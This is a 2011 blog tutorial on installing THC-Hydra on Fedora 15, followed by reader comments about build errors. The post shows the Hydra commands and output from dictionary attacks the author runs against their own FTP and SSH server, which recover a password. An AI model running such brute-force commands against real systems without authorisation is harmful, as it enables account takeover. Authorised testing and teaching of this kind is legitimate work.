Posted by: kezhong | September 26, 2011

Installing THC Hydra on Fedora 15

THC-Hydra is a remote dictionary attack tool that supports a lot of protocols and options. The following protocols are supported: AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. It is a powerful real-time brute force tool for hackers and network administrators alike.

Download and configure THC Hydra
# wget http://www.thc.org/releases/hydra-7.0-src.tar.gz
# tar xvzf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure

Starting hydra auto configuration …
Detected 64 Bit Linux OS

Checking for openssl (libssl, libcrypto, ssl.h, sha.h) …
                                                       … found
Checking for idn (libidn.so) …
                             … NOT found, unicode logins and passwords will not be supported
Checking for pcre (libpcre.so, pcre.h) …
                                       … NOT found, server response checks will be less reliable
Checking for Postgres (libpq.so, libpq-fe.h) …
                                             … NOT found, module postgres disabled
Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) …
                                                               … NOT found, module svn disabled
Checking for firebird (libfbclient.so) …
                                       … NOT found, module firebird disabled
Checking for MYSQL client (libmysqlclient.so, math.h) …
                                                      … NOT found, module Mysql will not support version > 4.x
Checking for AFP (libafpclient.so) …
                                   … NOT found, module Apple Filing Protocol disabled – Apple sucks anyway
Checking for NCP (libncp.so / nwcalls.h) …
                                         … NOT found, module NCP disabled
Checking for SAP/R3 (librfc/saprfc.h) …
                                      … NOT found, module sapr3 disabled
Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp
Checking for libssh (libssh/libssh.h) …
                                      … NOT found, module ssh disabled
Get it from http://www.libssh.org
Checking for Oracle (libocci.so libclntsh.so / oci.h) …
                                                      … NOT found, module Oracle disabled
Checking for GUI req’s (pkg-config, gtk+-2.0) …
                                              … NOT found, optional anyway

Hydra will be installed into …/bin of: /usr/local
  (change this by running ./configure –prefix=path)

Writing Makefile.in …
now type “make”

From the above, we know there are some packages need to be installed.
# yum install libidn-devel
# yum install pcre-devel
# yum install libpqxx-devel
# yum install subversion-devel
# yum install apr-devel
# yum install apr-util-devel
# yum install firebird-devel
# yum install mysql-devel
# yum install afpfs-ng-devel
# yum install ncpfs-devel
# yum install libssh-devel

Configure again.
# ./configure

Starting hydra auto configuration …
Detected 64 Bit Linux OS

Checking for openssl (libssl, libcrypto, ssl.h, sha.h) …
                                                       … found
Checking for idn (libidn.so) …
                             … found
Checking for pcre (libpcre.so, pcre.h) …
                                       … found
Checking for Postgres (libpq.so, libpq-fe.h) …
                                             … found
Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) …
                                                               … found
Checking for firebird (libfbclient.so) …
                                       … found
Checking for MYSQL client (libmysqlclient.so, math.h) …
                                                      … found
Checking for AFP (libafpclient.so) …
                                   … found
Checking for NCP (libncp.so / nwcalls.h) …
                                         … found
Checking for SAP/R3 (librfc/saprfc.h) …
                                      … NOT found, module sapr3 disabled
Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp
Checking for libssh (libssh/libssh.h) …
                                      … found
Checking for Oracle (libocci.so libclntsh.so / oci.h) …
                                                      … NOT found, module Oracle disabled
Checking for GUI req’s (pkg-config, gtk+-2.0) …
                                              … NOT found, optional anyway

Hydra will be installed into …/bin of: /usr/local
  (change this by running ./configure –prefix=path)

Writing Makefile.in …
now type “make”

Compile
# make

Now type make install

Install
# make install
strip hydra pw-inspector
echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
mkdir -p /usr/local/bin
cp hydra pw-inspector dpl4hydra* /usr/local/bin && cd /usr/local/bin && chmod 755 hydra pw-inspector
echo OK > /dev/null && test -x xhydra && cp xhydra /usr/local/bin && cd /usr/local/bin && chmod 755 xhydra || echo OK > /dev/null
mkdir -p /usr/local/man/man1
cp -f hydra.1 xhydra.1 pw-inspector.1 /usr/local/man/man1

Download the dictionary from John the Ripper
# wget http://download.openwall.net/pub/wordlists/all.gz
# gunzip all.gz
# mv all /tmp/password.lst

Try to attack my ftp server
# hydra 192.168.1.10 ftp -l kezhong -P /tmp/password.lst -e ns -t 32
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-23 08:35:55
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.10   login: kezhong   password: qwer1234
[STATUS] attack finished for 192.168.1.10 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-23 08:35:58

Try to do ssh brute force attack to my server
# hydra 192.168.1.10 ssh -l kezhong -P /tmp/password.lst -e ns -t 32
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-23 12:02:03
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.10   login: kezhong   password: qwer1234
[STATUS] attack finished for 192.168.1.10 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-23 12:02:05

Reference
http://thc.org/thc-hydra/

About these ads

Responses

  1. hi im saul and i have a problem i write “make”and apears this error ([dothack@localhost hydra-7.0-src]$ make
    gcc -I. -Wall -O2 -o pw-inspector pw-inspector.c
    make: gcc: Command not found
    make: [pw-inspector] Error 127 (ignored)
    gcc -I. -Wall -O2 -c hydra-vnc.c -DLIBOPENSSL -DLIBOPENSSLNEW -DLIBFIREBIRD -DLIBIDN -DHAVE_PR29_H -DHAVE_PCRE -DLIBMYSQLCLIENT -DLIBAFP -DLIBNCP -DLIBPOSTGRES -DLIBSVN -DLIBSSH -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 -I/usr/include/mysql -I/usr/include/afpfs-ng
    make: gcc: Command not found
    make: *** [hydra-vnc.o] Error 127) please i need your help hurry……

  2. Saul – You’ve not got gcc installed – best do this with yum install gcc or equivalent.

  3. i have many errors such as
    1.not found gcc
    please help me…
    :(

    • or you can install “Development Tools” and “Development Libraries” using yum

  4. i had the same pb
    i downloaded gcc and it was worst
    so i erase gcc
    and no more error for “make”

  5. This article helped me take care of my dependencies and my ./configure results look like yours. When I run make I’m getting the message below.

    /tmp/ccFc38Hy.o: In function `hydra_spawn_head’:
    hydra.c:(.text+0×3428): undefined reference to `service_smb’
    collect2: ld returned 1 exit status
    make: *** [hydra] Error 1

  6. I installed libssh like you did and it says it is found but when i run it i get this error:
    Error: Compiled without LIBSSH v0.4.x support, module is not available!

  7. [...] Make up a passlist file named passlist.txt or you can download the dictionary from John the Ripper as my past post http://kezhong.wordpress.com/2011/09/26/installing-thc-hydra-on-fedora-15/ [...]

  8. I have a problem when I arrive at this step: mv all/tmp/password.lst :
    “mv: missing destination file operand after `all/tmp/password.lst’
    Try `mv –help’ for more information.”


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories

Follow

Get every new post delivered to your Inbox.

Join 43 other followers

%d bloggers like this: